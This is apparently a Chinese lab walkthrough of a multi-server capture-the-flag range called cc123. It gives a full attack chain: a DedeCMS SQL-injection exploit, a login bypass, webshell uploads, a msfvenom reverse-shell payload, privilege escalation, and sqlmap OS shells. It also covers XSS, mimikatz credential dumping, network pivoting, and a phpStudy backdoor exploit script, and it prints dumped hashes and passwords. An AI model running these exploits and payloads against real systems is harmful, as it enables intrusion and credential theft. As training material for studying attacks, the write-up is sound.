1. 1. cc123靶场拓扑图
  2. 2. 1.信息收集
    1. 2.1. 1.0 创建文件夹
    2. 2.2. 1.1 主机发现
    3. 2.3. 1.2 端口扫描
    4. 2.4. 1.3 端口信息探测
    5. 2.5. 1.4 网站信息
    6. 2.6. 1.5 绑定本地hosts/网关设置
    7. 2.7. 1.6 子域名穷举
  3. 3. 2.漏洞测试
    1. 3.1. 2.1 dedecms安全测试
      1. 3.1.1. 查看版本号
      2. 3.1.2. 查看管理后台是否开启
      3. 3.1.3. 查看会员注册是否开启
      4. 3.1.4. 注入漏洞利用
        1. 3.1.4.1. 新建分类
        2. 3.1.4.2. 复制cookie
        3. 3.1.4.3. 配置exp
        4. 3.1.4.4. 执行exp
        5. 3.1.4.5. 进入后台管理系统登陆
      5. 3.1.5. 提权
    2. 3.2. 2.2 ww2.cc123.com安全测试
      1. 3.2.1. 目录扫描
      2. 3.2.2. 后台登陆页-SQL注入漏洞
      3. 3.2.3. 后台内-SQLMAP测试SQL注入
      4. 3.2.4. .NET代码审计
        1. 3.2.4.1. 验证码重复使用漏洞
        2. 3.2.4.2. 后台管理登陆SQL注入漏洞
        3. 3.2.4.3. 后台文件SQL注入漏洞
        4. 3.2.4.4. 后台编辑器KindEditor漏洞
        5. 3.2.4.5. 前台XSS漏洞
      5. 3.2.5. 后台用户名密码秘文解密
  4. 4. 3.内网渗透
    1. 4.1. 3.1web服务器
      1. 4.1.1. 网段梳理
      2. 4.1.2. 获取路由信息
      3. 4.1.3. 查看权限
      4. 4.1.4. 迁移进程
      5. 4.1.5. 获取哈希密码明文
    2. 4.2. 3.2数据库服务器
      1. 4.2.1. 添加路由
      2. 4.2.2. 配置proxychains
      3. 4.2.3. NMAP扫描
      4. 4.2.4. 数据库服务器信息整理
      5. 4.2.5. 生成正向连接的攻击载荷
      6. 4.2.6. 连接获取session
      7. 4.2.7. 网段梳理
      8. 4.2.8. 获取路由信息
      9. 4.2.9. 查看权限
      10. 4.2.10. 迁移进程
    3. 4.3. 3.3目标服务器
      1. 4.3.1. 添加路由
      2. 4.3.2. 编写phpstudy后门exp
        1. 4.3.2.1. 写入一句话木马
        2. 4.3.2.2. 访问后门shell.php
      3. 4.3.3. 使用SocksCap64设置本机代理
        1. 4.3.3.1. kali内配置proxychains
        2. 4.3.3.2. 本机内添加代理
        3. 4.3.3.3. 代理蚁剑
        4. 4.3.3.4. 正向连接
        5. 4.3.3.5. 执行bind.exe
        6. 4.3.3.6. 生成正向连接的攻击载荷
        7. 4.3.3.7. 迁移进程

暗月项目四-cc123

cc123靶场拓扑图

image-20220105141605099

共包含4个flag

(因个人实验环境的特殊情况,使用了两台kali攻击机,IP分别为192.168.137.22与192.168.137.185)

1.信息收集

1.0 创建文件夹

image-20220105142954593

1.1 主机发现

1
sudo net discover -i eth0 -r 192.168.134.0/24

image-20220105142140390

1.2 端口扫描

1
sudo masscan -p 1-65535 192.168.137.134 --rate=1000

image-20220105143946034

1.3 端口信息探测

1
sudo nmap -sC -A 192.168.137.134 -p53,80,135,999,3389,6588,49154,49155 -oA cc123-port

image-20220105144634836

1.4 网站信息

image-20220105150414683

image-20220105150446843

image-20220105150517846

1.5 绑定本地hosts/网关设置

1
2
3
4
5
6
7
8
9
10
11
windows:
绑定hosts
C:\Windows\System32\drivers\etc
192.168.137.134 www.cc123.com
DNS:192.168.137.134

kali:
sudo vi /etc/hosts
192.168.137.134 www.cc123.com
sudo vi /etc/resolv.conf
nameserver 192.168.137.134

1.6 子域名穷举

1
2
wfuzz -w /usr/share/amass/wordlists/subdomains-top1mil-5000.txt -u cc123.com -H "Host:FUZZ.cc123.com" --hw 53
#kali内总是报错 查不出原因

image-20220105161044599

KesionEDU www.cc123.com
dedecms new.cc123.com
Net ww2.cc123.com

2.漏洞测试

2.1 dedecms安全测试

查看版本号

1
http://new.cc123.com/data/admin/ver.txt

image-20220105162605149

版本为20150618 该版本存在注入漏洞

image-20220117103642064

查看管理后台是否开启

1
http://new.cc123.com/dede

image-20220105163030212

管理后台开启,尝试默认密码,错误失败

查看会员注册是否开启

/member – 发现开放会员注册 – 注册用户 – byesec – 登录

image-20220105161436256

image-20220105161801696

image-20220105161920404

注入漏洞利用

新建分类

image-20220105165343523

复制cookie

image-20220105165827417

image-20220105165957478

配置exp

放入exp目录下的cookie.txt文件内并修改exp

image-20220105170208038

执行exp
1
python Dedecms_20150618_member_sqli.py http://new.cc123.com

image-20220105171636328

得到加密的密码 812df726be884ddcfc41

image-20220105171806378

最终的到admin的密码为admin7788

进入后台管理系统登陆
1
2
3
http://new.cc123.com/dede
admin
admin7788

image-20220105172007094

登陆成功

image-20220105172052018

上传一句话木马

image-20220105172143524

写入木马上传

image-20220105172401188

image-20220105172603430

image-20220105172637529

使用蚁剑连接

image-20220105173951031

提权

在蚁剑内翻阅目录发现权限不足

image-20220105173951031

发现在目录下是NET环境,尝试上传.NET文件看能否解析执行

image-20220105175318757

上传webshell到根部录下的/a内

image-20220106093024524

访问ASPXSpy2014.aspx

1
http://new.cc123.com/a/ASPXSpy2014.aspx

输入密码admin

image-20220106094028758

image-20220106094241337

尝试是否可以执行命令

image-20220106094315945

结果显示可以执行命令

下一步的思路是:能否在msf内生成payload执行以达到提权的目的

msf生成payload

1
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.137.22 lport=12345 -f exe >s.exe

image-20220106095651519

上传生成的s.exe,发现可能是写权限不足

image-20220106095955787

上传使用wt.asp脚本来扫描可写目录

image-20220106100241167

1
访问http://new.cc123.com/a/wt.asp

image-20220106101417517

image-20220106101518186

尝试向c:\windows\debug\WIA\目录内上传s.exe

image-20220106101921905

上传成功后配置msf

1
2
3
4
5
6
7
8
9
10
11
msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.137.22

set lport 12345

run

image-20220106102311623

执行s.exe

image-20220106102603447

成功反弹shell

image-20220106102643899

1
ipconfig

image-20220106102917805

1
getuid

image-20220106103001792

1
background
1
2
3
4
5
6
7
use post/multi/recon/local_exploit_suggester

show options

set session 1

run

image-20220106103658401

⚠️:kali的msf内没有可用的exp

image-20220106110056898

⚠️:经过询问得知是新版本的kali内的msf对本项目,在提权的时候存在一些不可知的问题,故采用老版本的kali2020.1进行尝试

重新生成c.exe-执行反弹shell-搜索可用的本地提权

image-20220106122617785

1
2
3
4
use exploit/windows/local/ms16_075_reflection_juicy
show options
set session 1
run
1
getuid

image-20220106122930265

成功提权至系统权限

查看flag

2.2 ww2.cc123.com安全测试

image-20220106142531457

复制响应头

image-20220106142657082

分析响应头

仍然为ASP.NET 版本4.0

image-20220106142755251

目录扫描

gobuster连接超时

1
gobuster dir -u http://ww2.cc123.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x 'aspx,html' -o ~/cc123/cc123-ww2-dir.log

image-20220106154748426

dirsearch连接超时

1
dirsearch -u http://ww2.cc123.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e aspx,html -o cc123-ww2.log

image-20220114165917028

可能是因为配置原因..在kali内这两个工具都无法连接

救急采用了御剑

image-20220106161641310

1
访问http://ww2.cc123.com/admin

image-20220106161849933

尝试了默认密码/弱口令等无果

image-20220106162204624

使用burpsuite对该页面进行抓包分析

image-20220106162836820

右键–Request in browser–in original session–copy–浏览器访问

image-20220106163347072

重复提交包,并未对验证码进行校验(可能存在验证码重复利用漏洞),可直接发送至Intruder模块对其进行密码的爆破

后台登陆页-SQL注入漏洞

在Repeater内检测

修改用户名为admin’ 但结果并没有报错

image-20220106163915371

修改用户名为admin’–+ 尝试注释后面的语句 页面发生了重定向

image-20220106164038132

猜测其查询语句大致为:

1
select * from users where username='admin' and password='123456'

添加注释后则为

1
2
select * from users where username='admin'-- ' and password='123456'
select * from users where username='admin' #则只执行了该语句

在浏览器内尝试提交用户名admin’–空格 密码任意

利用该漏洞成功以管理员身份登陆进入了后台管理系统

image-20220106164749119

后台内-SQLMAP测试SQL注入

image-20220110101910993

将抓取到的页面包放入SQLMAP中进行测试(bp.txt)

测试是否存在注入

1
sqlmap -r bp.txt --dbms mssql -v 1 --batch

image-20220114170228801

列库

1
sqlmap -r bp.txt --dbms mssql -v 1 --dbs

image-20220114170354079

查询数据无法直接看到

1
sqlmap -r bp.txt --dbms mssql -v 1 -D grams_data -T username --dump

image-20220110104337746

获取mssql的shell

1
sqlmap -r bp.txt --dbms mssql -v 1 --os-shell

image-20220110103712249

image-20220110103804859

image-20220110103943402

主机名为WIN-JJU7KU45PN7。根据以上信息猜测为站库分离。

.NET代码审计

1
cd c:\HwsHostMaster\wwwroot\ww2cc123_55m39g\web\bin

image-20220110105330264

image-20220110105456556

下载

1
download c:\HwsHostMaster\wwwroot\ww2cc123_55m39g\web\bin

image-20220110105910519

image-20220110110050372

拷贝至本地IlSpy反编译dll进行审计

image-20220114090608874

验证码重复使用漏洞

image-20220110115555917漏洞验证

image-20220110115925979

image-20220110120137804

后台管理登陆SQL注入漏洞

image-20220114091117775

漏洞验证

image-20220114093100487

image-20220114093122880

后台文件SQL注入漏洞

image-20220114095030882

image-20220114093515301

image-20220114095243902

漏洞验证

image-20220114100149401

后台编辑器KindEditor漏洞

image-20220114100045676

image-20220114103106885

image-20220114100424391

image-20220114100512643

image-20220114100540040

抓包修改验证

image-20220114101155076

image-20220114101256651

image-20220114101629577

访问ww2.cc123.com/editor/asp.net/../attached/file/20220114/20220114101159_6235.html

成功弹回cookie

image-20220114101957669

前台XSS漏洞

查看前台文件

image-20220114105555276

image-20220114105913840

访问该文件

image-20220114110232582

image-20220114110321901

构造payload

1
http://ww2.cc123.com/mystat.aspx?style=</script><script>alert(/xss/);</script><script>

image-20220114113621777

后台用户名密码秘文解密

之前得到利用SQL MAP得到的用户名和密码都是无法直接获取的

image-20220114120243875

利用工具

查询配置文件中的数据库连接信息

1
cat web.config

image-20220114120617365

将其放入工具中 Go连接

image-20220114121533124

查询admin表内的数据

1
select * from admin

image-20220114121751133

得到用户名密码信息

id username password roleId
28 admin AE5F6187F32825CA 1
30 cc123 B97C57DB005F954242450A255217DA9F 1

在MD5在线平台进行解密发现失败

寻找加密方法

image-20220114142301537

image-20220114142325595

解密方法

image-20220117130802644

编写解密小工具

image-20220117125851927

image-20220117125940559

填写key进行解密

image-20220117130215277

image-20220117130338775

id username password roleId
28 admin cc123 1
30 cc123 qweasd123 1

3.内网渗透

3.1web服务器

网段梳理

1
ipconfig

192.168.137.134

10.10.10.135

image-20220117150336674

获取路由信息

1
run get_local_subnets

image-20220117151100055

查看权限

1
getuid

image-20220117151331624

迁移进程

1
ps

image-20220117151748225

1
migrate 1580

image-20220117151907379

获取哈希密码明文

1
run hashdump

image-20220117165606506

Administrator:500:aad3b435b51404eeaad3b435b51404ee:1c933df09b600efabee0791aaccc43f2:::

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

MySQL_HWS:1001:aad3b435b51404eeaad3b435b51404ee:6a75a75e4cfd3cf00faf743e17e90a53:::

PhpMyAdmin_HWS:1002:aad3b435b51404eeaad3b435b51404ee:a14b615c584d6b043f42f1cfab9779cd:::

huweishen542147:1004:aad3b435b51404eeaad3b435b51404ee:c76eea2615348c5228f7027d3ccab02d:::

cc123:1005:aad3b435b51404eeaad3b435b51404ee:afdeb425b4a55982deb4e80fa3387576:::

newcc123:1007:aad3b435b51404eeaad3b435b51404ee:97824315153b4dd665d6c688f446ebf1:::

ww2cc123:1008:aad3b435b51404eeaad3b435b51404ee:adadf2dd832421c26a96705fd09a32bd:::

1
load mimikatz
1
mimikatz_command -f samdump::hashes

image-20220117170110495

1
mimikatz_command -f sekurlsa::searchPasswords

image-20220117170931096

1
wdigest/tspkg

image-20220117171103054

管理员的账号和密码:Administrator !@#Qwe123.

3.2数据库服务器

添加路由

1
run autoroute -s 10.10.10.0/24
1
run autoroute -p

image-20220117172004612

1
background 
1
use auxiliary/server/sock4a
1
show options
1
set SRVPORT 2222

image-20220117174652378

配置proxychains

kali攻击机:

1
sudo vim /etc/proxychains.conf

绑定本机

1
socks4 127.0.0.1 2222

image-20220117174848494

NMAP扫描

1
proxychains nmap -sT -Pn 10.10.10.136

扫描速度比较慢 在扫描过程中发现80端口开放

测试是否可以访问

1
proxychains firefox http://10.10.10.136

访问结果为不可访问

image-20220117185650203

数据库服务器信息整理

1
os-shell>netstat -ano

image-20220118144511896

1
os-shell>ipconfig

image-20220118144711979

生成正向连接的攻击载荷

1
msfvenom -p windows/meterpreter/bind_tcp LPORT=13777 -f exe > bind.exe

image-20220118145830046

上传载荷

image-20220118151146581

执行载荷

image-20220118151224280

连接获取session

1
2
3
4
5
use exploit/multi/handler
set payload windows/meterpreter/bin_tcp
set LPORT 13777
set RHOST 10.10.10.136
run

image-20220118153143998

image-20220118153232512

网段梳理

1
ipconfig

10.10.10.136

10.10.1.128

img

获取路由信息

1
run get_local_subnets

img

查看权限

img

迁移进程

1
ps

img

1
migrate 1532

img

获取哈希密码明文

1
run hashdump

img

Administrator:500:aad3b435b51404eeaad3b435b51404ee:15132c3d36a7e5d7905e02b478979046::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

1
2
load mimikatz
mimikatz_command -f samdump::hashes

img

1
mimikatz_command -f sekurlsa::searchPasswords

img

1
wdigest/tspkg

img

管理员的账号和密码:Administrator !@#QWEasd123.

3.3目标服务器

添加路由

1
2
run autoroute -s 10.10.1.0/24
run autoroute -p

img

NMAP扫描

1
proxychains nmap -sT -Pn 10.10.1.129

img

扫描速度比较慢 ,在扫描过程中发现80端口开放,测试是否可以访问

1
proxychains3 firefox http://10.10.1.129

img

发现是phpstudy PHP版本为5.4.45

搜索phpstudy后门事件

img

img

参考链接:

phpStudy后门漏洞复现_LuckySec-CSDN博客_phpstudy漏洞

phpStudy后门漏洞利用复现 - 雨中落叶 - 博客园

编写phpstudy后门exp

1
vim phpstudy.py

img

#conding:utf-8

import requests import sys import base64

shell = “system(‘“+sys.argv[1]+”‘);” shell_base64 = base64.b64encode(shell.encode(‘utf-8’))

header={‘Accept-charset’:shell_base64,’Accept-Encoding’:’gzip,deflate’}

def exploit(url): html = requests.get(url=url,headers=header).text return html

url = “http://10.10.1.129/" print(exploit(url))

写入一句话木马
1
proxychains3 python3 phpstudy.py "echo ^<?php @eval(\$_POST[\"shell\"])?^>>c:\phpstudy\WWW\shell.php"

img

访问后门shell.php

img

使用SocksCap64设置本机代理

kali内配置proxychains

确认kali的IP

img

1
sudo vim /etc/proxychains.conf

img

本机内添加代理

img

测试代理是否正常

img

代理蚁剑

img

img

img

img

正向连接

上传bind.exe

img

执行bind.exe

img

生成正向连接的攻击载荷
1
2
3
4
background
set LPORT 13777
set RHOST 10.10.1.129
run

img

迁移进程
1
ps

img

1
migrate 1340

img

1
2
3
4
shell
arp -a
systeminfo
Ctrl+C返回

img

获取4个flag

1
2
3
background
sessions
sessions -i 3

img

flag1

1
sessions -i 3

web服务器内

img

flag2

web服务器内

img

flag3

数据库服务器内

1
sessions -i 4

img

flag4

目标服务器内

1
sessions -i 8

img